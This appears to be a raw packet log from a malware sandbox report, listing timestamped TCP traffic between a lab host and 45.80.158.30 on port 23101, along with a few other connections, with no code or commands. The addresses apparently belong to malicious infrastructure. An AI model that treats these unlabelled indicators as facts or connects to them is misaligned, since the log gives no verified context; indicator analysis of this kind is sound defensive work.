Dec 19, 2024 13:19:47.126162052 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.126183033 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.126364946 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.126511097 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.126554966 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.449640989 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:47.569405079 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.861407042 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:47.902399063 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:47.903681040 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:48.022133112 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.022149086 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.022160053 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.022176981 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.022288084 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.022303104 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.022383928 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.022392035 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.022399902 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.022480965 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142767906 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142780066 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142786980 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142796040 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142803907 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142813921 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142906904 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142915964 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142942905 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.142986059 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.143001080 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.143017054 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.143026114 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.465689898 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:48.585283995 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.878679991 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:48.916357994 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:48.917781115 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:49.036416054 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.036456108 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.036514044 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.036542892 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.036571026 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.036598921 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.036649942 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.036678076 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.036808014 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.036837101 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.155899048 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.155987978 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156018972 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156050920 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156080008 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156132936 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156160116 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156212091 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156239986 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156290054 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156317949 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156364918 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156393051 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.156420946 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.481547117 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:49.601636887 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.924560070 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:49.976160049 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:49.977349043 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:50.096040964 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.096054077 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.096061945 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.096081018 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.096301079 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.096309900 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.096357107 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.096374989 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.096419096 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.113702059 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.113713026 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215567112 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215579987 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215588093 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215598106 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215675116 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215683937 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215750933 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215759993 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215770960 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215868950 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215886116 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.215930939 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.496989012 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:50.616607904 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.910940886 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:50.948834896 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:50.950038910 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:51.068854094 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.068865061 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.068880081 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.068887949 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.068897009 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.068900108 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.068938971 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.068947077 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.069036007 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.113327026 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.113337994 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192264080 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192276001 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192285061 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192383051 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192390919 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192399025 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192409992 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192531109 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192540884 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192548037 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192557096 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.192673922 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.515614986 CET  49741  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:51.635301113 CET  23101  49741  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.927434921 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:51.961622953 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:51.962924957 CET  49742  23101  192.168.2.4      45.80.158.30
Dec 19, 2024 13:19:52.081415892 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.081440926 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.081554890 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.081605911 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.081682920 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.081692934 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.081754923 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.081798077 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.081861019 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.128140926 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.128154993 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.201046944 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.201065063 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.201073885 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.201107979 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.201117992 CET  23101  49742  45.80.158.30     192.168.2.4
Dec 19, 2024 13:19:52.201199055 CET  23101  49742  45.80.158.30     192.168.2.4
                                                                                              Dec 19, 2024 13:19:52.201208115 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:52.201314926 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:52.201323986 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:52.201380014 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:52.201389074 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:52.201495886 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:52.528069019 CET4974123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:52.647659063 CET231014974145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:52.940886021 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:52.993787050 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:52.995143890 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:53.113812923 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.113828897 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.113908052 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.113917112 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.113950968 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.113989115 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.114069939 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.114078999 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.114115953 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.114203930 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233325005 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233338118 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233449936 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233458996 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233469963 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233532906 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233541965 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233582020 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233591080 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233752012 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233761072 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233767986 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.233812094 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.552454948 CET4974123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:53.672307968 CET231014974145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:53.964828968 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.009102106 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:54.010438919 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:54.129007101 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.129019976 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.129036903 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.129048109 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.129107952 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.129117012 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.129174948 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.129184008 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.129209995 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.140930891 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.140940905 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.248692989 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.248760939 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.248770952 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.248801947 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.248819113 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.248895884 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.248913050 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.248975039 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.249078989 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.249089003 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.249104977 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.249114037 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.558983088 CET4974123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:54.678569078 CET231014974145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:54.978956938 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.025130033 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:55.026606083 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:55.145041943 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.145065069 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.145076036 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.145165920 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.145215988 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.145226002 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.145267010 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.145275116 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.145337105 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.145347118 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264574051 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264591932 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264694929 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264705896 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264717102 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264774084 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264782906 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264837980 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264847994 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264864922 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264873981 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264971018 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264986992 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.264996052 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:55.574575901 CET4974123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:55.694200039 CET231014974145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.061078072 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.104542971 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:56.105897903 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:56.224487066 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.224498034 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.224517107 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.224525928 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.224571943 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.224580050 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.224642038 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.224649906 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.224713087 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.224720955 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344141006 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344196081 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344273090 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344330072 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344340086 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344475985 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344485044 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344552994 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344588041 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344698906 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344708920 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344768047 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.344779015 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.559551954 CET231014973945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:56.639821053 CET4974123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:56.746233940 CET4973923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:56.759406090 CET231014974145.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:57.060869932 CET231014974245.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:57.152491093 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:19:58.300040960 CET231014973945.80.158.30192.168.2.4
                                                                                              Dec 19, 2024 13:19:58.355629921 CET4973923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:01.184544086 CET4973923101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:01.186203957 CET4974123101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:01.186252117 CET4974080192.168.2.4178.237.33.50
                                                                                              Dec 19, 2024 13:20:01.186278105 CET4974223101192.168.2.445.80.158.30
                                                                                              Dec 19, 2024 13:20:05.334201097 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:05.334239960 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:05.334328890 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:05.334714890 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:05.334728956 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:06.697949886 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:06.698055983 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:06.699553013 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:06.699561119 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:06.700020075 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:06.701122046 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:06.747365952 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.201380968 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.246253014 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.395883083 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.395906925 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.395960093 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.395983934 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.396004915 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.396018028 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.396038055 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.396059036 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.396192074 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.448168993 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.448249102 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.448252916 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.448276997 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.448314905 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.448337078 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.588958025 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.589023113 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.589037895 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.589050055 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.589071989 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.589088917 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.627621889 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.627681017 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.627715111 CET49755443192.168.2.45.182.211.158
                                                                                              Dec 19, 2024 13:20:07.627727985 CET443497555.182.211.158192.168.2.4
                                                                                              Dec 19, 2024 13:20:07.627765894 CET49755443192.168.2.45.182.211.158
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 19, 2024 13:20:07.627775908 CET  49755        443        192.168.2.4      5.182.211.158
Dec 19, 2024 13:20:07.661247969 CET  443          49755      5.182.211.158    192.168.2.4
Dec 19, 2024 13:20:07.661307096 CET  443          49755      5.182.211.158    192.168.2.4
Dec 19, 2024 13:20:07.661351919 CET  49755        443        192.168.2.4      5.182.211.158
Dec 19, 2024 13:20:07.661370039 CET  443          49755      5.182.211.158    192.168.2.4
Dec 19, 2024 13:20:07.661390066 CET  49755        443        192.168.2.4      5.182.211.158
Dec 19, 2024 13:20:07.661406040 CET  49755        443        192.168.2.4      5.182.211.158
Dec 19, 2024 13:20:07.777821064 CET  443          49755      5.182.211.158    192.168.2.4
Dec 19, 2024 13:20:07.777915001 CET  443          49755      5.182.211.158    192.168.2.4
Dec 19, 2024 13:20:07.777921915 CET  49755        443        192.168.2.4      5.182.211.158
Dec 19, 2024 13:20:07.777960062 CET  443          49755      5.182.211.158    192.168.2.4
Dec 19, 2024 13:20:07.777976036 CET  49755        443        192.168.2.4      5.182.211.158
Dec 19, 2024 13:20:07.778043985 CET  49755        443        192.168.2.4      5.182.211.158
Dec 19, 2024 13:20:07.802773952 CET  443          49755      5.182.211.158    192.168.2.4
Dec 19, 2024 13:20:07.802841902 CET  443          49755      5.182.211.158    192.168.2.4
Dec 19, 2024 13:20:07.802886009 CET  49755        443        192.168.2.4      5.182.211.158
Dec 19, 2024 13:20:07.802896023 CET  443          49755      5.182.211.158    192.168.2.4
Dec 19, 2024 13:20:07.802930117 CET  49755        443        192.168.2.4      5.182.211.158
Dec 19, 2024 13:20:07.802943945 CET  49755        443        192.168.2.4      5.182.211.158
